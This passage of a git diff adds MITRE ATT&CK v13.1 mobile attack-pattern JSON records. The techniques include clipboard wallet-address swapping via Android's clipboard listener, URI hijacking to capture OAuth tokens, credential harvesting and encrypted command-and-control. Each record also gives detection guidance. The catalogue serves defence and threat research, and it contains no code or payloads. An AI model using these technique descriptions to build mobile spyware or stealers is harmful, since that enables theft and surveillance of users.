Retrieved August 8, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html", + "external_id": "APP-40" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6.json new file mode 100644 index 0000000000000000000000000000000000000000..b2484fbc0b8efbaddb3a423eac103ac2e23090bd --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--e57b0263-d91e-44a2-965c-ec0bff2f3d02", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:44:26.748Z", + "name": "Transmitted Data Manipulation", + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.\n\nOne method to achieve [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the `ClipboardManager.OnPrimaryClipChangedListener` interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10.\n\nAdversaries may use [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) to replace text prior to being pasted. 
For example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.\n\n[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) was seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Applications could be vetted for their use of the clipboard manager APIs with extra scrutiny given to application that make use of them.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "created": "2022-04-06T13:39:39.779Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1641/001", + "external_id": "T1641.001" + }, + { + "source_name": "ESET Clipboard Modification February 2019", + "description": "ESET. (2019, February 11). First clipper malware discovered on Google Play.. Retrieved July 26, 2019.", + "url": "https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5.json new file mode 100644 index 0000000000000000000000000000000000000000..9d5a0f1ff6a660051fd1279a0361c4867a886186 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5.json 
@@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--e84098c4-1f25-4d12-89a6-497700ecf566", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:43:49.443Z", + "name": "URI Hijacking", + "description": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data. \n\nApplications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If an adversary were to register for a URI that was already in use by a genuine application, the adversary may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the adversary to gain access to protected resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_contributors": [ + "Leo Zhang, Trend Micro", + "Steven Du, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it. When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. 
(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "created": "2022-04-01T15:15:35.640Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1635/001", + "external_id": "T1635.001" + }, + { + "source_name": "Android-AppLinks", + "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.", + "url": "https://developer.android.com/training/app-links/index.html" + }, + { + "source_name": "Trend Micro iOS URL Hijacking", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/" + }, + { + "source_name": "IETF-PKCE", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016.", + "url": "https://tools.ietf.org/html/rfc7636" + }, + { + "source_name": "IETF-OAuthNativeApps", + "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.", + "url": "https://tools.ietf.org/html/rfc8252" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--8e27551a-5080-4148-a584-c64348212e4f.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--8e27551a-5080-4148-a584-c64348212e4f.json new file mode 100644 index 0000000000000000000000000000000000000000..233ea82527b90b9889c9d38e5bf7e2beaa5cd19a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--8e27551a-5080-4148-a584-c64348212e4f.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--8bb97d20-ab93-41ad-9962-fe0ad404c969", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8e27551a-5080-4148-a584-c64348212e4f", + "created": "2017-10-25T14:48:31.694Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1447", + "url": "https://attack.mitre.org/techniques/T1447" + }, + { + "source_name": "Android DevicePolicyManager 2019", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html", + "description": "Android Developers. (n.d.). DevicePolicyManager. Retrieved September 22, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.", + "modified": "2022-03-30T19:50:37.727Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Delete Device Data", + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. 
Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f.json new file mode 100644 index 0000000000000000000000000000000000000000..ebcb84df6a1dca89a934ab6b71cd65430d676642 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--b012ac16-0dd6-4ba1-b5ab-b4a6b64437af", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:58:20.113Z", + "name": "Remote Device Management Services", + "description": "An adversary may use access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "created": "2022-04-05T19:37:15.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430/001", + "external_id": "T1430.001" + }, + { + "source_name": "Krebs-Location", + "description": "Brian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. 
Retrieved November 8, 2018.", + "url": "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "external_id": "ECO-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "external_id": "EMM-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922.json new file mode 100644 index 0000000000000000000000000000000000000000..8c946954fc06845cd1bf3f9adec022c712aaa73c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--9484df21-841a-425c-8529-a452795d1da3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:28:28.234Z", + "name": "Calendar Entries", + "description": "Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the `EventKit` framework. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [Calendar Entries](https://attack.mitre.org/techniques/T1636/001) without the user\u2019s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. Application vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application\u2019s manifest, or `NSCalendarsUsageDescription` in an iOS application\u2019s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "created": "2022-04-01T12:48:27.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/001", + "external_id": "T1636.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303.json new file mode 100644 index 0000000000000000000000000000000000000000..c72f0b5550ec4a66400d35fc3500dbc8eae4d7df --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--ce93c3cf-f60c-4d46-ab46-f5be640ac75f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "created": "2022-04-05T20:14:17.310Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521.001", + "url": "https://attack.mitre.org/techniques/T1521/001" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, Blowfish, and RC4.", + "modified": "2022-04-05T20:14:17.310Z", + "name": "Symmetric Cryptography", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3.json new file mode 100644 index 0000000000000000000000000000000000000000..613d6f4ac941dee2aa7af9204436b68cd9d86285 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--9f4e064f-37aa-419c-99a6-c20e2c209f7a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T15:45:44.103Z", + "name": "Credentials from Password Store", + "description": "Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices. Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "created": "2022-04-01T14:55:10.494Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1634", + "external_id": "T1634" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "external_id": "AUT-11" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + 
], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63.json new file mode 100644 index 0000000000000000000000000000000000000000..d5f10f5ec59967c7d32d4158a8361ca813963062 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--c692a9c5-5c08-4477-8616-7dcfeaca0390", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63", + "created": "2017-10-25T14:48:25.322Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1463", + "url": "https://attack.mitre.org/techniques/T1463" + }, + { + "source_name": "FireEye-SSL", + "url": "https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html", + "description": "Adrian Mettler, Yulong Zhang, Vishwanath Raman. (2014, August 20). SSL VULNERABILITIES: WHO LISTENS WHEN ANDROID APPLICATIONS TALK?. Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-1" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. 
For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).", + "modified": "2022-04-06T15:44:48.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Manipulate Device Communication", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a.json new file mode 100644 index 0000000000000000000000000000000000000000..5ae59440cd3d33c4d21748ee8547da3dffed91fa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--fb4d19b9-549e-4256-a3f1-432d632c1efb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "created": "2019-10-10T15:12:42.790Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1533", + "url": "https://attack.mitre.org/techniques/T1533" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-41" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration. \n\n \n\nAccess to local system data, which includes information stored by the operating system, often requires escalated privileges. Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may also attempt to access files from external storage which may require additional storage-related permissions. 
\n\n ", + "modified": "2022-04-01T16:53:27.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data from Local System", + "x_mitre_detection": "Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd.json new file mode 100644 index 0000000000000000000000000000000000000000..177c233c01603c00919732f55d27ed3cf72e09ce --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--359a7149-d4a7-4ba6-96c7-bb555d1d5178", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:53:59.025Z", + "name": "Out of Band Data", + "description": "Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth. \n\n \n\nOn Android, applications can read push notifications to capture content from SMS messages, or other out of band data streams. This requires that the user manually grant notification access to the application via the settings menu. However, the application could launch an Intent to take the user directly there. \n\n \n\nOn iOS, there is no way to programmatically read push notifications. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If a user sees a notification with text they do not recognize, they should review their list of installed applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "created": "2022-04-06T15:27:34.300Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1644", + "external_id": "T1644" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84.json new file mode 100644 index 0000000000000000000000000000000000000000..de76e688d67d182ee13794809f66b26af18af872 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--a0b16799-dd0c-4bc5-ae2a-ee4d26ec4b1e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "created": "2019-10-01T14:18:47.762Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521", + "url": "https://attack.mitre.org/techniques/T1521" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.", + "modified": "2022-04-05T20:11:35.852Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Encrypted Channel", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific 